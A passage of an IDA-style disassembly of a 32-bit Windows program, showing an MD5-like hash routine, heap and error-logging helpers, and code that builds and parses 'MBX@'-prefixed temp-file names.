xor eax, ebx
add eax, [ebp+var_34]
lea eax, [edx+eax+432AFF97h]
mov edx, eax
shr edx, 16h
shl eax, 0Ah
or edx, eax
mov eax, ebx
add edx, ecx
not eax
or eax, edx
xor eax, ecx
add eax, [ebp+var_18]
lea eax, [edi+eax-546BDC59h]
mov edi, eax
shr edi, 11h
shl eax, 0Fh
or edi, eax
mov eax, ecx
add edi, edx
push 85845DD1h
not eax
or eax, edi
push 15h
xor eax, edx
push [ebp+var_4C]
add eax, [ebp+var_3C]
lea ebx, [ebx+eax-36C5FC7h]
mov eax, ebx
shl eax, 15h
shr ebx, 0Bh
or eax, ebx
mov ebx, edx
add eax, edi
not ebx
or ebx, eax
mov [ebp+var_8], eax
xor ebx, edi
add ebx, [ebp+var_20]
lea ecx, [ecx+ebx+655B59C3h]
mov ebx, ecx
shr ebx, 1Ah
shl ecx, 6
or ebx, ecx
mov ecx, edi
add ebx, eax
not ecx
or ecx, ebx
push ebx
xor ecx, eax
mov [ebp+var_4], ebx
add ecx, [ebp+var_44]
not eax
lea edx, [edx+ecx-70F3336Eh]
mov ecx, edx
shr ecx, 16h
shl edx, 0Ah
or ecx, edx
add ecx, ebx
or eax, ecx
push ecx
xor eax, ebx
mov [ebp+var_10], ecx
add eax, [ebp+var_28]
lea eax, [edi+eax-100B83h]
mov edx, eax
shr edx, 11h
shl eax, 0Fh
or edx, eax
lea eax, [ebp+var_8]
add edx, ecx
push edx
push eax
mov [ebp+var_C], edx
call sub_508280
push 6FA87E4Fh
push 6
push [ebp+var_30]
lea eax, [ebp+var_4]
push [ebp+var_10]
push [ebp+var_C]
push [ebp+var_8]
push eax
call sub_508280
push 0FE2CE6E0h
push 0Ah
push [ebp+var_14]
lea eax, [ebp+var_10]
push [ebp+var_C]
push [ebp+var_8]
push [ebp+var_4]
push eax
call sub_508280
add esp, 54h
push 0A3014314h
push 0Fh
push [ebp+var_38]
lea eax, [ebp+var_C]
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_10]
push eax
call sub_508280
push 4E0811A1h
push 15h
push [ebp+var_1C]
lea eax, [ebp+var_8]
push [ebp+var_4]
push [ebp+var_10]
push [ebp+var_C]
push eax
call sub_508280
push 0F7537E82h
push 6
push [ebp+var_40]
lea eax, [ebp+var_4]
push [ebp+var_10]
push [ebp+var_C]
push [ebp+var_8]
push eax
call sub_508280
add esp, 54h
lea eax, [ebp+var_10]
push 0BD3AF235h
push 0Ah
push [ebp+var_24]
push [ebp+var_C]
push [ebp+var_8]
push [ebp+var_4]
push eax
call sub_508280
push 2AD7D2BBh
push 0Fh
push [ebp+var_48]
lea eax, [ebp+var_C]
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_10]
push eax
call sub_508280
push 0EB86D391h
push 15h
push [ebp+var_2C]
lea eax, [ebp+var_8]
push [ebp+var_4]
push [ebp+var_10]
push [ebp+var_C]
push eax
call sub_508280
mov eax, [ebp+var_4]
add esp, 54h
add [esi], eax
mov eax, [ebp+var_8]
add [esi+4], eax
mov eax, [ebp+var_C]
add [esi+8], eax
mov eax, [ebp+var_10]
add [esi+0Ch], eax
pop edi
pop esi
pop ebx
leave
retn 4
sub_5079D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_508280 proc near ; CODE XREF: sub_5079D8+79C�p
; sub_5079D8+7B8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, [ebp+arg_C]
mov edx, [ebp+arg_0]
not eax
or eax, [ebp+arg_4]
push esi
push 20h
xor eax, [ebp+arg_8]
pop ecx
sub ecx, [ebp+arg_14]
add eax, [edx]
add eax, [ebp+arg_10]
add eax, [ebp+arg_18]
mov esi, eax
shr esi, cl
mov ecx, [ebp+arg_14]
shl eax, cl
or esi, eax
add esi, [ebp+arg_4]
mov [edx], esi
pop esi
pop ebp
retn
sub_508280 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5082B3 proc near ; CODE XREF: sub_50785D+F2�p
; sub_50785D+12D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
jbe short loc_5082F6
mov edx, [ebp+arg_0]
mov ecx, [ebp+arg_4]
push esi
or esi, 0FFFFFFFFh
lea eax, [edx+1]
sub esi, edx
loc_5082CB: ; CODE XREF: sub_5082B3+40�j
mov dl, [ecx]
mov [eax-1], dl
mov edx, [ecx]
shr edx, 8
mov [eax], dl
mov edx, [ecx]
shr edx, 10h
mov [eax+1], dl
mov edx, [ecx]
shr edx, 18h
mov [eax+2], dl
add eax, 4
add ecx, 4
lea edx, [esi+eax]
cmp edx, [ebp+arg_8]
jb short loc_5082CB
pop esi
loc_5082F6: ; CODE XREF: sub_5082B3+7�j
pop ebp
retn 0Ch
sub_5082B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5082FA proc near ; CODE XREF: sub_5079D8+2B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
jbe short loc_50833E
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
push esi
push edi
push 0FFFFFFFEh
lea eax, [edx+2]
pop esi
sub esi, edx
loc_508313: ; CODE XREF: sub_5082FA+40�j
movzx edi, byte ptr [eax-1]
xor edx, edx
mov dh, [eax+1]
mov dl, [eax]
add eax, 4
shl edx, 8
or edx, edi
movzx edi, byte ptr [eax-6]
shl edx, 8
or edx, edi
mov [ecx], edx
lea edx, [esi+eax]
add ecx, 4
cmp edx, [ebp+arg_8]
jb short loc_508313
pop edi
pop esi
loc_50833E: ; CODE XREF: sub_5082FA+7�j
pop ebp
retn 0Ch
sub_5082FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_508342 proc near ; CODE XREF: _5:004FEC71�p _5:004FEC92�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push 0
push 0
push 0
push [ebp+var_4]
call ds:dword_511778 ; RaiseException
leave
retn
sub_508342 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50835A proc near ; CODE XREF: sub_4FD2E0+3C8�p
; _5:004FEE70�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
call sub_508397
mov [ebp+var_8], eax
cmp [ebp+arg_0], 0
jnz short loc_508371
xor eax, eax
jmp short locret_508395
; ---------------------------------------------------------------------------
loc_508371: ; CODE XREF: sub_50835A+11�j
push [ebp+arg_0]
push 8
push [ebp+var_8]
call ds:dword_511740 ; RtlAllocateHeap
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_508392
mov ecx, 0EF000009h
call sub_508342
loc_508392: ; CODE XREF: sub_50835A+2C�j
mov eax, [ebp+var_4]
locret_508395: ; CODE XREF: sub_50835A+15�j
leave
retn
sub_50835A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_508397 proc near ; CODE XREF: sub_50835A+5�p
; sub_5083DD:loc_5083E9�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
cmp ds:dword_511A44, 0
jnz short loc_5083C0
push 0
push 10000h
push 0
call ds:dword_511748 ; HeapCreate
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ds:dword_511A44, eax
jmp short loc_5083C8
; ---------------------------------------------------------------------------
loc_5083C0: ; CODE XREF: sub_508397+B�j
mov eax, ds:dword_511A44
mov [ebp+var_4], eax
loc_5083C8: ; CODE XREF: sub_508397+27�j
cmp [ebp+var_4], 0
jnz short loc_5083D8
mov ecx, 0EF00000Dh
call sub_508342
loc_5083D8: ; CODE XREF: sub_508397+35�j
mov eax, [ebp+var_4]
leave
retn
sub_508397 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5083DD proc near ; CODE XREF: _5:004FE1FE�p
; sub_4FF00C+10�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
jnz short loc_5083E9
jmp short locret_5083FF
; ---------------------------------------------------------------------------
loc_5083E9: ; CODE XREF: sub_5083DD+8�j
call sub_508397
mov [ebp+var_4], eax
push [ebp+arg_0]
push 0
push [ebp+var_4]
call ds:dword_511744 ; RtlFreeHeap
locret_5083FF: ; CODE XREF: sub_5083DD+A�j
leave
retn
sub_5083DD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_508401 proc near ; CODE XREF: sub_50848C+64�p
; sub_5084F7+3A�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push 0
push 0
call ds:dword_5117C4 ; ChangeDisplaySettingsA
push 10h
push ds:off_50E4F4
push [ebp+var_4]
push 0
call ds:dword_5117D0 ; MessageBoxA
push 0
call ds:dword_5116E4 ; GetCurrentProcess
push eax
call ds:dword_511798 ; TerminateProcess
leave
retn
sub_508401 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_508436 proc near ; CODE XREF: sub_50848C+52�p
; sub_50848C+5C�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E500
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_1C], ecx
and [ebp+var_4], 0
push [ebp+var_1C]
call sub_508538
pop ecx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_50847D
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_50847D: ; CODE XREF: sub_508436+3A�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_508436 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50848C proc near ; CODE XREF: sub_4FF036+C4�p
; sub_4FF94C+CD�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
push offset dword_511A28
call ds:dword_5116C4 ; RtlEnterCriticalSection
mov [ebp+var_8], offset dword_511A48
push [ebp+arg_4]
push [ebp+arg_0]
push offset aErrorAtSDReaso ; "Error at %s:%d\n\nReason: "
push [ebp+var_8]
call ds:dword_5117D4 ; wsprintfA
add esp, 10h
mov [ebp+var_C], eax
lea eax, [ebp+arg_C]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_8]
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
push eax
call ds:dword_5117D8 ; wvsprintfA
and [ebp+var_4], 0
mov ecx, [ebp+var_8]
call sub_508436
mov ecx, offset asc_510D5C ; "\n"
call sub_508436
mov ecx, [ebp+var_8]
call sub_508401
leave
retn
sub_50848C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5084F7 proc near ; CODE XREF: sub_504AB0+128�p
; sub_50DAB0+8�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], offset dword_511A48
lea eax, [ebp+arg_4]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_0]
push [ebp+var_8]
call ds:dword_5117D8 ; wvsprintfA
and [ebp+var_4], 0
mov ecx, [ebp+var_8]
call sub_508436
mov ecx, offset asc_510D5C ; "\n"
call sub_508436
mov ecx, [ebp+var_8]
call sub_508401
leave
retn
sub_5084F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_508538 proc near ; CODE XREF: sub_508436+30�p
; sub_508726+74�p ...
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E510
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 1Ch
push ebx
push esi
push edi
push offset dword_511A28
call ds:dword_5116C4 ; RtlEnterCriticalSection
and [ebp+var_1C], 0
and [ebp+var_4], 0
mov eax, offset dword_4FD720
mov eax, [eax+4]
mov eax, [eax+78h]
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz loc_5086AD
push 400h
call sub_50835A
pop ecx
mov [ebp+var_30], eax
mov eax, [ebp+var_30]
mov [ebp+var_1C], eax
push 0
call ds:dword_511718 ; GetModuleHandleA
mov ecx, offset dword_4FD720
mov ecx, [ecx+4]
mov [ecx+7Ch], eax
mov eax, offset dword_4FD720
mov eax, [eax+4]
cmp dword ptr [eax+7Ch], 0
jnz short loc_5085C2
jmp loc_5086F6
; ---------------------------------------------------------------------------
loc_5085C2: ; CODE XREF: sub_508538+83�j
push 400h
push [ebp+var_1C]
mov eax, offset dword_4FD720
mov eax, [eax+4]
push dword ptr [eax+7Ch]
call ds:dword_511714 ; GetModuleFileNameA
test eax, eax
jnz short loc_5085E4
jmp loc_5086F6
; ---------------------------------------------------------------------------
loc_5085E4: ; CODE XREF: sub_508538+A5�j
mov edi, [ebp+var_1C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_24], ecx
push offset aUp_txt ; "-up.txt"
mov eax, [ebp+var_1C]
add eax, [ebp+var_24]
push eax
call ds:dword_5117D4 ; wsprintfA
pop ecx
pop ecx
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push [ebp+var_1C]
call ds:dword_5116A8 ; CreateFileA
mov ecx, offset dword_4FD720
mov ecx, [ecx+4]
mov [ecx+78h], eax
mov eax, offset dword_4FD720
mov eax, [eax+4]
mov eax, [eax+78h]
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_508648
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_508690
loc_508648: ; CODE XREF: sub_508538+108�j
push offset aUp1_txt ; "-up1.txt"
mov eax, [ebp+var_1C]
add eax, [ebp+var_24]
push eax
call ds:dword_5117D4 ; wsprintfA
pop ecx
pop ecx
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push [ebp+var_1C]
call ds:dword_5116A8 ; CreateFileA
mov ecx, offset dword_4FD720
mov ecx, [ecx+4]
mov [ecx+78h], eax
mov eax, offset dword_4FD720
mov eax, [eax+4]
mov eax, [eax+78h]
mov [ebp+var_20], eax
loc_508690: ; CODE XREF: sub_508538+10E�j
cmp [ebp+var_20], 0
jz short loc_50869C
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_50869E
loc_50869C: ; CODE XREF: sub_508538+15C�j
jmp short loc_5086F6
; ---------------------------------------------------------------------------
loc_50869E: ; CODE XREF: sub_508538+162�j
push 2
push 0
push 0
push [ebp+var_20]
call ds:dword_511788 ; SetFilePointer
loc_5086AD: ; CODE XREF: sub_508538+4A�j
cmp [ebp+var_20], 0FFFFFFFFh
jz short loc_5086E7
push 0
lea eax, [ebp+var_28]
push eax
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
push ecx
push [ebp+arg_0]
push [ebp+var_20]
call ds:dword_5117BC ; WriteFile
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
cmp [ebp+var_28], ecx
jz short loc_5086E7
jmp short loc_5086F6
; ---------------------------------------------------------------------------
loc_5086E7: ; CODE XREF: sub_508538+179�j
; sub_508538+1AB�j ...
push 0FFFFFFFFh
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
jmp short loc_508717
; ---------------------------------------------------------------------------
loc_5086F6: ; CODE XREF: sub_508538+85�j
; sub_508538+A7�j ...
and [ebp+var_2C], 0
jmp short loc_5086E7
; ---------------------------------------------------------------------------
loc_5086FC: ; DATA XREF: _6:0050E518�o
push offset dword_511A28
call ds:dword_511754 ; RtlLeaveCriticalSection
mov eax, [ebp+var_1C]
mov [ebp+var_34], eax
push [ebp+var_34]
call sub_5083DD
pop ecx
retn
; ---------------------------------------------------------------------------
loc_508717: ; CODE XREF: sub_508538+1BC�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_508538 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_508726 proc near ; CODE XREF: sub_500C5C+345�p
; sub_508C27+1D�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
; FUNCTION CHUNK AT 005087BB SIZE 0000000F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E520
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 14h
push ebx
push esi
push edi
and [ebp+var_1C], 0
and [ebp+var_4], 0
push 1000h
call sub_50835A
pop ecx
mov [ebp+var_28], eax
mov eax, [ebp+var_28]
mov [ebp+var_1C], eax
lea eax, [ebp+arg_4]
mov [ebp+var_20], eax
push [ebp+var_20]
push [ebp+arg_0]
push [ebp+var_1C]
call ds:dword_5117D8 ; wvsprintfA
mov [ebp+var_24], eax
push offset asc_510D90 ; "\r\n"
mov eax, [ebp+var_1C]
add eax, [ebp+var_24]
push eax
call ds:dword_5117D4 ; wsprintfA
pop ecx
pop ecx
and [ebp+var_20], 0
push [ebp+var_1C]
call sub_508538
pop ecx
or [ebp+var_4], 0FFFFFFFFh
call sub_5087AB
jmp short loc_5087BB
sub_508726 endp
; =============== S U B R O U T I N E =======================================
sub_5087AB proc near ; CODE XREF: sub_508726+7E�p
; DATA XREF: _6:0050E528�o
mov eax, [ebp-1Ch]
mov [ebp-2Ch], eax
push dword ptr [ebp-2Ch]
call sub_5083DD
pop ecx
retn
sub_5087AB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_508726
loc_5087BB: ; CODE XREF: sub_508726+83�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_508726
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5087CA proc near ; CODE XREF: sub_5061E1+D39�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00508883 SIZE 0000000F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E530
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 10h
push ebx
push esi
push edi
and [ebp+var_1C], 0
and [ebp+var_20], 0
and [ebp+var_4], 0
push 1000h
call sub_50835A
pop ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_1C], eax
push 0
push 0
lea eax, [ebp+var_20]
push eax
push 400h
call ds:dword_511710 ; RtlGetLastWin32Error
push eax
push 0
push 1300h
call ds:dword_5116DC ; FormatMessageA
cmp [ebp+var_20], 0
jz short loc_508859
push [ebp+arg_4]
push [ebp+arg_0]
push [ebp+var_20]
push offset aWindowsErrorSA ; "windows error %s\n at %s(%d)\n"
push [ebp+var_1C]
call ds:dword_5117D4 ; wsprintfA
add esp, 14h
push [ebp+var_1C]
call sub_508538
pop ecx
loc_508859: ; CODE XREF: sub_5087CA+6A�j
or [ebp+var_4], 0FFFFFFFFh
call sub_508864
jmp short loc_508883
sub_5087CA endp
; =============== S U B R O U T I N E =======================================
sub_508864 proc near ; CODE XREF: sub_5087CA+93�p
; DATA XREF: _6:0050E538�o
cmp dword ptr [ebp-20h], 0
jz short loc_508873
push dword ptr [ebp-20h]
call ds:dword_511764 ; LocalFree
loc_508873: ; CODE XREF: sub_508864+4�j
mov eax, [ebp-1Ch]
mov [ebp-28h], eax
push dword ptr [ebp-28h]
call sub_5083DD
pop ecx
retn
sub_508864 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_5087CA
loc_508883: ; CODE XREF: sub_5087CA+98�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_5087CA
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_508892 proc near ; CODE XREF: sub_5058CF+A2�p
; sub_5061E1+1F4�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push edi
movzx eax, ds:byte_511A40
and eax, 1
test eax, eax
jnz short loc_5088BE
mov al, ds:byte_511A40
or al, 1
mov ds:byte_511A40, al
call ds:dword_5116E8 ; GetCurrentProcessId
mov ds:dword_511A20, eax
loc_5088BE: ; CODE XREF: sub_508892+13�j
cmp [ebp+arg_8], 0
jnz short loc_5088CE
mov eax, ds:dword_511A20
mov [ebp+var_10], eax
jmp short loc_5088D4
; ---------------------------------------------------------------------------
loc_5088CE: ; CODE XREF: sub_508892+30�j
mov eax, [ebp+arg_8]
mov [ebp+var_10], eax
loc_5088D4: ; CODE XREF: sub_508892+3A�j
mov eax, [ebp+var_10]
mov [ebp+var_8], eax
push 124h
call sub_50835A
pop ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
push 49h
pop ecx
xor eax, eax
mov edi, [ebp+var_4]
rep stosd
push [ebp+var_4]
push 104h
call ds:dword_511734 ; GetTempPathA
movzx eax, [ebp+arg_4]
test eax, eax
jz short loc_508948
mov eax, ds:dword_515A48
inc eax
mov ds:dword_515A48, eax
push ds:dword_515A48
push [ebp+arg_0]
push [ebp+var_8]
push offset aMbx@X@X@X_ ; "MBX@%X@%X@%X.###"
mov edi, [ebp+var_4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov eax, [ebp+var_4]
add eax, ecx
push eax
call ds:dword_5117D4 ; wsprintfA
add esp, 14h
jmp short loc_50899B
; ---------------------------------------------------------------------------
loc_508948: ; CODE XREF: sub_508892+7A�j
cmp [ebp+arg_0], 0FFFFFFFFh
jz short loc_508977
push [ebp+arg_0]
push [ebp+var_8]
push offset aMbx@X@X_ ; "MBX@%X@%X.###"
mov edi, [ebp+var_4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov eax, [ebp+var_4]
add eax, ecx
push eax
call ds:dword_5117D4 ; wsprintfA
add esp, 10h
jmp short loc_50899B
; ---------------------------------------------------------------------------
loc_508977: ; CODE XREF: sub_508892+BA�j
push [ebp+var_8]
push offset aMbx@X@_ ; "MBX@%X@*.###"
mov edi, [ebp+var_4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov eax, [ebp+var_4]
add eax, ecx
push eax
call ds:dword_5117D4 ; wsprintfA
add esp, 0Ch
loc_50899B: ; CODE XREF: sub_508892+B4�j
; sub_508892+E3�j
mov edi, [ebp+var_4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
push ecx
push [ebp+var_4]
call ds:dword_5117C8 ; CharUpperBuffA
mov eax, [ebp+var_4]
pop edi
leave
retn
sub_508892 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5089B8 proc near ; CODE XREF: sub_508A16+E1�p
; sub_508A16+150�p
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
movzx eax, [ebp+arg_0]
cmp eax, 30h
jl short loc_5089D6
movzx eax, [ebp+arg_0]
cmp eax, 39h
jg short loc_5089D6
movzx eax, [ebp+arg_0]
sub eax, 30h
jmp short loc_508A14
; ---------------------------------------------------------------------------
loc_5089D6: ; CODE XREF: sub_5089B8+A�j
; sub_5089B8+13�j
movzx eax, [ebp+arg_0]
cmp eax, 41h
jl short loc_5089F1
movzx eax, [ebp+arg_0]
cmp eax, 46h
jg short loc_5089F1
movzx eax, [ebp+arg_0]
sub eax, 37h
jmp short loc_508A14
; ---------------------------------------------------------------------------
loc_5089F1: ; CODE XREF: sub_5089B8+25�j
; sub_5089B8+2E�j
movzx eax, [ebp+arg_0]
cmp eax, 61h
jl short loc_508A0C
movzx eax, [ebp+arg_0]
cmp eax, 66h
jg short loc_508A0C
movzx eax, [ebp+arg_0]
sub eax, 57h
jmp short loc_508A14
; ---------------------------------------------------------------------------
loc_508A0C: ; CODE XREF: sub_5089B8+40�j
; sub_5089B8+49�j
mov eax, [ebp+arg_4]
mov byte ptr [eax], 1
xor eax, eax
loc_508A14: ; CODE XREF: sub_5089B8+1C�j
; sub_5089B8+37�j ...
pop ebp
retn
sub_5089B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_508A16 proc near ; CODE XREF: sub_50153F+2DE�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4A = byte ptr -4Ah
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E540
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 40h
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
cmp [ebp+arg_0], 0
jz loc_508BF5
call ds:dword_5116E8 ; GetCurrentProcessId
mov [ebp+var_1C], eax
push 5Ch
push [ebp+arg_0]
call sub_4FC700
pop ecx
pop ecx
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_508A71
mov eax, [ebp+var_24]
inc eax
mov [ebp+arg_0], eax
loc_508A71: ; CODE XREF: sub_508A16+52�j
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_20], ecx
cmp [ebp+var_20], 4
jle loc_508BF5
push 4
pop ecx
mov edi, offset aMbx@ ; "MBX@"
mov esi, [ebp+arg_0]
xor eax, eax
mov [ebp+var_34], eax
repe cmpsb
jz short loc_508AA7
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_34], eax
loc_508AA7: ; CODE XREF: sub_508A16+87�j
mov eax, [ebp+var_34]
mov [ebp+var_38], eax
cmp [ebp+var_38], 0
jnz loc_508BF5
mov eax, [ebp+arg_0]
add eax, 4
mov [ebp+arg_0], eax
push 40h
push [ebp+arg_0]
call sub_4FC640
pop ecx
pop ecx
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz loc_508BF5
and [ebp+var_30], 0
and [ebp+var_2C], 0
loc_508AE1: ; CODE XREF: sub_508A16+FC�j
lea eax, [ebp+var_2C]
push eax
mov eax, [ebp+arg_0]
mov al, [eax]
mov byte ptr [ebp+var_3C], al
push [ebp+var_3C]
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
call sub_5089B8
pop ecx
pop ecx
and eax, 0Fh
mov ecx, [ebp+var_30]
shl ecx, 4
or eax, ecx
mov [ebp+var_30], eax
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_28]
jnz short loc_508AE1
movzx eax, [ebp+var_2C]
test eax, eax
jnz loc_508BF5
mov eax, [ebp+var_30]
cmp eax, [ebp+var_1C]
jnz loc_508BF5
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
push 2Eh
push [ebp+arg_0]
call sub_4FC640
pop ecx
pop ecx
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz loc_508BF5
and [ebp+var_30], 0
loc_508B50: ; CODE XREF: sub_508A16+16B�j
lea eax, [ebp+var_2C]
push eax
mov eax, [ebp+arg_0]
mov al, [eax]
mov byte ptr [ebp+var_40], al
push [ebp+var_40]
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
call sub_5089B8
pop ecx
pop ecx
and eax, 0Fh
mov ecx, [ebp+var_30]
shl ecx, 4
or eax, ecx
mov [ebp+var_30], eax
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_28]
jnz short loc_508B50
movzx eax, [ebp+var_2C]
test eax, eax
jnz short loc_508BF5
mov [ebp+var_44], offset a__3 ; ".###"
mov eax, [ebp+arg_0]
mov [ebp+var_48], eax
loc_508B98: ; CODE XREF: sub_508A16+1B4�j
